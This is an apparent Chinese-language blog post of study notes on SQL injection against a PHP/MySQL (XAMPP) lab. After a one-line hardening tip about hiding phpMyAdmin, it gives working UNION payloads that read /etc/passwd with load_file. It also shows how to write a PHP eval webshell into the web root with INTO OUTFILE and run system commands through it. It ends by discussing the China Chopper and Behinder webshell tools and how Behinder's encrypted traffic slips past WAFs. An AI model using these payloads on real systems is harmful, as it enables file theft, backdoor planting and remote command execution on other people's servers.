eveplw

导航

3.SQL注入-查询漏洞二

一.不要开启phpmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

 2.修改phpmyadmin目录名称为不容易猜测的

 

二.SQL注入-文件读写以及木马植入

1.读写权限确认

 secure_file_priv = 空的时候,任意读写

 secure_file_priv = 某个路径的时候,只能在那个路径下读写

 secure_file_priv = NULL,不能读写

 #利用SQL语句读取系统文件

-1 union select 1,2,3,load_file("/etc/passwd"),5

select load_file("/opt/lampp/htdocs/security/common.php")

#利用SQL语句写入系统文件

select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php"

-1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5
into outfile "/opt/lampp/htdocs/security/muma.php"

#访问muma.php执行指令
muma.php?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型,参数自定义

3.传输过程为明文传输,目前已经被WAF给拦截了

 

四.Behinder冰蝎

1.冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");

 

posted on 2022-07-31 16:54  eveplw  阅读(55)  评论(0编辑  收藏  举报